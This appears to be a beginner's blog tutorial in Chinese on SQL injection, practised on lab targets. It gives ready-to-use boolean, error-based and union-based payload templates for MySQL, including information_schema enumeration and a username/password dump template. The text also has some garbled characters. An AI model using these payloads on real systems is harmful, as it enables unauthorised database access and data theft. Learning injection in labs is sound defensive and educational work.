摘要:原理分析關(guān)于錯誤回顯基于錯誤回顯的注入就是通過語句的矛盾性來使數(shù)據(jù)被回顯到頁面上���。因?yàn)?���,注入可以直接返回信息而不是布爾值?/p>
實(shí)習(xí)期間的主要工作是研究 WEB 安全�����,剛開始的時候�����,研究的主要是 SQL 注入,因?yàn)橹皼]有搞過安全�����,所有費(fèi)了好長一段時間對 SQL 注入基本知識進(jìn)行了解��。這篇文章并不是什么很深入的技術(shù)博客�����,或許應(yīng)該叫它‘ SQL注入掃盲 ’����。
關(guān)于 SQL Injection
SQL Injection 就是通過把惡意的 SQL 命令插入到 Web 表單讓服務(wù)器執(zhí)行�,最終達(dá)到欺騙服務(wù)器或數(shù)據(jù)庫執(zhí)行惡意的 SQL 命令。
學(xué)習(xí) SQL 注入���,首先要搭一個靶機(jī)環(huán)境,我使用的是 OWASP BWA,感興趣的可以去官網(wǎng)下載一個安裝���,除了 SQL 注入�,很多靶機(jī)環(huán)境都可以在 BWA 中找到,它專門為 OWASP ZAP 滲透工具設(shè)計的。
$id?=?$_GET["id"];
$getid?=?"SELECT?first_name,?last_name?FROM?users?WHERE?user_id?=?"$id"";
$result?=?mysql_query($getid)?or?die(""?.?mysql_error()?.?"
"?);
$num?=?mysql_numrows($result);?
這是一個很簡單的 PHP代碼�,從前臺獲得 id 的值�,交給數(shù)據(jù)庫來執(zhí)行�,把結(jié)果返回給前臺����。
比如我們在 OWASP 里輸入 id = 1�����,點(diǎn)擊 Submit,返回結(jié)果如下:
稍微懂一點(diǎn)后臺或者數(shù)據(jù)庫的人都知道�,上面的那段代碼是有嚴(yán)重問題的,沒有對 id 的值進(jìn)行有效性���、合法性判斷����。也就是說����,我們在 submit 輸入框輸入的如何內(nèi)容都會被提交給數(shù)據(jù)庫執(zhí)行�����,比如在輸入框輸入1" or "1"="1����,執(zhí)行就會變成:
//原先要在數(shù)據(jù)庫中執(zhí)行的命令
SELECT?first_name,?last_name?FROM?users?WHERE?user_id?=?"1"
//變成
SELECT?first_name,?last_name?FROM?users?WHERE?user_id?=?"1" or "1"="1"
注意一下單引號,這是 SQL 注入中非常重要的一個地方,所以注入代碼的最后要補(bǔ)充一個 "1"="1讓單引號閉合�����。
由于 or 的執(zhí)行���,會把數(shù)據(jù)庫表 users 中的所有內(nèi)容顯示出來�����,
下面對三種主要的注入類型進(jìn)行介紹�。
Boolean-based 原理分析
首先不得不講SQL中的AND和OR
AND 和 OR 可在 WHERE 子語句中把兩個或多個條件結(jié)合起來。
AND:返回第一個條件和第二個條件都成立的記錄����。
OR:返回滿足第一個條件或第二個條件的記錄。
AND和OR即為集合論中的交集和并集�����。
下面是一個數(shù)據(jù)庫的查詢內(nèi)容�����。
mysql> select * from students;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
| 10058 | Jaune | 22 |
| 10060 | Alisa | 29 |
+-------+-------+-----+
3 rows in set (0.00 sec)
1)
mysql> select * from students where TRUE ;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
| 10058 | Jaune | 22 |
| 10060 | Alisa | 29 |
+-------+-------+-----+
3 rows in set (0.00 sec)
2)
mysql> select * from students where FALSE ;
Empty set (0.00 sec)
3)
mysql> SELECT * from students where id = 10056 and TRUE ;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
+-------+-------+-----+
1 row in set (0.00 sec)
4)
mysql> select * from students where id = 10056 and FALSE ;
Empty set (0.00 sec)
5)
mysql> selcet * from students where id = 10056 or TRUE ;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
| 10058 | Jaune | 22 |
| 10060 | Alisa | 29 |
+-------+-------+-----+
3 rows in set (0.00 sec)
6)
mysql> select * from students where id = 10056 or FALSE ;
+-------+-------+-----+
| id | name | age |
+-------+-------+-----+
| 10056 | Doris | 20 |
+-------+-------+-----+
1 row in set (0.00 sec)
會發(fā)現(xiàn)and 1=1 , and 1=2 即是 and TRUE , and FALSE 的變種�。
這便是最基礎(chǔ)的boolean注入,以此為基礎(chǔ)你可以自由組合語句�����。
字典爆破流
and exists(select * from ?) //?為猜測的表名
and exists(select ? from x) //?為猜測的列名
截取二分流
and (length((select schema_name from information_schema.schemata limit 1))>?) //判斷數(shù)據(jù)庫名的長度
and (substr((select schema_name from information_schema.schemata limit 1),1,1)>"?")
and (substr((select schema_name from information_schema.schemata limit 1),1,1)<"?") //利用二分法判斷第一個字符
Boolean-based總結(jié)
根據(jù)前面的介紹����,我們知道,對于基于Boolean-based的注入��,必須要有一個可以正常訪問的地址,比如http: //redtiger.labs.overthewire.org/level4.php?id=1 是一個可以正常訪問的記錄���,說明id=1的記錄是存在的��,下面的都是基于這個進(jìn)一步猜測���。先來判斷一個關(guān)鍵字keyword的長度,在后面構(gòu)造id=1 and (select length(keyword) from table)=1�����,從服務(wù)器我們會得到一個返回值�,如果和先前的返回值不一樣,說明and后面的(select length(keyword) from table)=1返回false����,keyword的長度不等于1。繼續(xù)構(gòu)造直到id=1 and (select length(keyword) from table)=15返回true���,說明keyword的長度為15���。
為什么我們剛開始一定要找一個已經(jīng)存在的id,其實(shí)這主要是為了構(gòu)造一個為真的情況�����。Boolean-based就是利用查詢結(jié)果為真和為假時的不同響應(yīng),通過不斷猜測來找到自己想要的東西���。
對于keyword的值����,mysql數(shù)據(jù)庫可以使用substr(string, start, length)函數(shù)���,截取string從第start位開始的length個字符串id=1 and (select substr(keyword,1,1) from table) ="A"�,依此類推���,就可以獲得keyword的在數(shù)據(jù)庫中的值。
Boolean-based的效率很低��,需要多個請求才能確定一個值��,盡管這種代價可以通過腳本來完成��,在有選擇的情況下����,我們會優(yōu)先選擇其他方式�。
Error Based 原理分析
關(guān)于錯誤回顯
基于錯誤回顯的sql注入就是通過sql語句的矛盾性來使數(shù)據(jù)被回顯到頁面上�。
所用到的函數(shù)
count() 統(tǒng)計元祖的個數(shù)(相當(dāng)于求和)
如select count(*) from information_schema.tables;
rand()用于產(chǎn)生一個0~1的隨機(jī)數(shù)
floor()向下取整
group by 依據(jù)我們想要的規(guī)矩對結(jié)果進(jìn)行分組
concat將符合條件的同一列中的不同行數(shù)據(jù)拼接,以逗號隔開
用于錯誤回顯的sql語句
第一種: 基于 rand() 與 group by 的錯誤
利用group by part of rand() returns duplicate key error這個bug�����,關(guān)于rand()函數(shù)與group by 在mysql中的錯誤報告如下:
**RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.
You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.**
這個bug會爆出duplicate key這個錯誤���,然后順便就把數(shù)據(jù)偷到了��。
公式:username=admin" and (select 1 from (select count(), concat(floor(rand(0)2),0x23,(你想獲取的數(shù)據(jù)的sql語句))x from information_schema.tables group by x )a) and "1" = "1
第二種: XPATH爆信息
這里主要用到的是ExtractValue()和UpdateXML()這2個函數(shù)���,由于mysql 5.1以后提供了內(nèi)置的XML文件解析和函數(shù),所以這種注入只能用于5.1版本以后使用
查看sql手冊
語法:EXTRACTVALUE (XML_document, XPath_string);
第一個參數(shù):XML_document是String格式��,為XML文檔對象的名稱����,文中為Doc
第二個參數(shù):XPath_string (Xpath格式的字符串) ,如果不了解Xpath語法�����,可以在網(wǎng)上查找教程。
作用:從目標(biāo)XML中返回包含所查詢值的字符串
語法:UPDATEXML (XML_document, XPath_string, new_value);
第一個參數(shù):XML_document是String格式����,為XML文檔對象的名稱,文中為Doc
第二個參數(shù):XPath_string (Xpath格式的字符串) �,如果不了解Xpath語法,可以在網(wǎng)上查找教程�。
第三個參數(shù):new_value,String格式����,替換查找到的符合條件的數(shù)據(jù)
作用:改變文檔中符合條件的節(jié)點(diǎn)的值
現(xiàn)在就很清楚了,我們只需要不滿足XPath_string(Xpath格式)就可以了���,但是由于這個方法只能爆出32位�����,所以可以結(jié)合mid來使用
公式1:username=admin" and (extractvalue(1, concat(0x7e,(你想獲取的數(shù)據(jù)的sql語句)))) and "1"="1
公式2:username=admin" and (updatexml(1, concat(0x7e,(你想獲取的數(shù)據(jù)的sql語句)),1)) and "1"="1
基于錯誤回顯的注入,總結(jié)起來就一句話���,通過sql語句的矛盾性來使數(shù)據(jù)被回顯到頁面上����,但有時候局限于回顯只能回顯一條����,導(dǎo)致基于錯誤的注入偷數(shù)據(jù)的效率并沒有那么高�,但相對于布爾注入已經(jīng)提高了一個檔次�����。
union query injection
要了解union query injection���,首先得了解union查詢���,union用于合并兩個或更多個select的結(jié)果集。比如說
SELECT username, password FROM account;
結(jié)果是
admin 123456
SELECT id, title FROM article
的結(jié)果是
1 Hello, World
SELECT username, password FROM account
UNION
SELECT id, title FROM article
的結(jié)果就是
admin 123456
1 Hello, World
比起多重嵌套的boolean注入�,union注入相對輕松。因?yàn)?����,union注入可以直接返回信息而不是布爾值��。前面的介紹看出把union會把結(jié)果拼拼到一起����,所有要讓union前面的查詢返回一個空值,一般采用類似于id=-1的方式。
1)
mysql> select name from students where id = -1 union select schema_name from information_schema.schemata; //數(shù)據(jù)庫名
+--------------------+
| name |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| rumRaisin |
| t3st |
| test |
+--------------------+
6 rows in set (0.00 sec)
2)
mysql> select name from students where id = -1 union select table_name from information_schema.tables where table_schema="t3st"; //表名
+----------+
| name |
+----------+
| master |
| students |
+----------+
2 rows in set (0.00 sec)
3)
mysql> select name from students where id = -1 union select column_name from information_schema.columns where table_name = "students" ; //列名
+------+
| name |
+------+
| id |
| name |
| age |
+------+
3 rows in set (0.00 sec)
UNION 操作符用于合并兩個或多個 SELECT 語句的結(jié)果集��。請注意�,UNION 內(nèi)部的 SELECT 語句必須擁有相同數(shù)量的列。列也必須擁有相似的數(shù)據(jù)類型����。同時,每條 SELECT 語句中的列的順序必須相同����。
舉個例子,還以最開始的 OWASP 為基礎(chǔ)�,返回了兩個值分別是 first_name 和 sur_name,可想而知���,服務(wù)器在返回數(shù)據(jù)庫的查詢結(jié)果時�,就會把結(jié)果中的第一個值和第二個值傳給 first_name 和 sur_name�����,多了或少了����,都會引起報錯。
所以你如果想要使用union查詢來進(jìn)行注入�,你首先要猜測后端查詢語句中查詢了多少列,哪些列可以回顯給用戶���。
猜測列數(shù)
-1 union select 1
-1 union select 1,2
-1 union select 1,2,3
//直到頁面正常顯示
比如這條語句
-1 UNION SELECT 1,2,3,4
如果顯示的值為3和4�,表示該查詢結(jié)果中有四列�����,并且第三列和第四列是有用的�。則相應(yīng)的構(gòu)造union語句如下
-1 UNION SELECT 1,2,username,password FROM table
小結(jié)一下
SQL 注入大概有5種,還有兩種分別是 Stacked_queries(基于堆棧)和 Time-based blind(時間延遲)�����,堆棧就是多語句查詢�����,用 ‘;’ 把語句隔開�,和 union 一樣;時間延遲就是利用 sleep() 函數(shù)讓數(shù)據(jù)庫延遲執(zhí)行�����,偷數(shù)據(jù)的速度很慢。(還有一個第六種���,內(nèi)聯(lián)注入��,但和前面涉及的內(nèi)容有所重疊�����,就不多帶帶來討論了)寫這篇文章的時候��,也是剛剛接觸 markdown 的時候��,很多格式都不規(guī)范�,比如中英文之間半角的空格都沒有����,大家就且看且無視吧。
引用說明�,自己之前研究 SQL 注入的時候,也是一點(diǎn)一點(diǎn)摸索的����,本博客的大部分內(nèi)容是來自于公司內(nèi)網(wǎng)的服務(wù)器中(公司定期考核,看你都干了什么)��。當(dāng)時因?yàn)槭莾?nèi)網(wǎng)�,就沒有做引用,現(xiàn)在想找到這些引用的文章也很困難�,見諒。
歡迎來我的博客交流�����。
